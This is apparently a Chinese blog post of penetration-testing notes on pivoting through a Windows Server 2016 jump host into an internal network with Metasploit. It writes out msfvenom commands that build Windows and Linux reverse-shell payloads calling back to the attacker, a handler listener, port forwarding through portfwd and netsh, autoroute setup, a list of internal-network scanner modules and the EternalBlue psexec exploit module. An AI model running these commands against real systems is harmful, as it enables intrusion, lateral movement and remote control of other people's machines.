内网攻击跳板机为Windows

  • 攻击机kali 192.168.114.62 仅可和 192.168.114.63 通信
  • 中间机 192.168.114.63 和 10.10.10.128 windows 2016 server
  • 内网机 10.10.10.129 10.10.10.130 Linux和windos
  • kali生成对应的shell
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.62 LPORT=4444 -f exe > /tmp/shell.exe

  • 传入192.168.114.63
    use exploit/multi/handler
    设置选项,进行监听
    
    portfwd add -l 8889 -r 10.10.10.130 -p 80   #开启端口转发,将内网的80端口转发到本机的8889端口,该方法网速较慢
    
    netsh interface portproxy add v4tov4 listenport=8888 connectaddress=10.10.10.130 connectport=80   #使用shell,在windows2016上开启端口转发

     

     

  • 进入server2016的shell,使用arp -a 初步摸清网段
    在Meterpreter中先利用 run get_local_subnets 查看目标主机的路由情况
    run autoroute -s 192.168.114.0/24   #添加对应网段
    也可以:run post/multi/manage/autoroute  自动添加木马所在主机上的所有路由
    或者在MSF提示符下使用: route add 添加路由

  • 之后在Meterpreter使用 run autoroute -p 查看添加的路由
  • 使用bg或backgroud命令回退到MSF提示符,并利用以下模块扫描存活主机:
    auxiliary/scanner/discovery/arp_sweep    #基于ARP的本地网络发现
    auxiliary/scanner/portscan/syn           #基于tcp的syn回复进行端口扫描
    auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
    auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
    auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
    auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
    auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
    auxiliary/scanner/http/title             #探测内网http服务的标题
    auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
    use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
    use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口 
    auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
    auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP服务,基于默认3389端口
    auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
    auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
    auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字

  • 扫出结果,有以下端口开放

 

  • 对指定端口进行扫描

 

  • 选择针对的模块
    exploit/windows/smb/ms17_010_psexec   #根据永恒之蓝制作的主动模块
    
    msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > msfshell.elf #linux木马

     

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值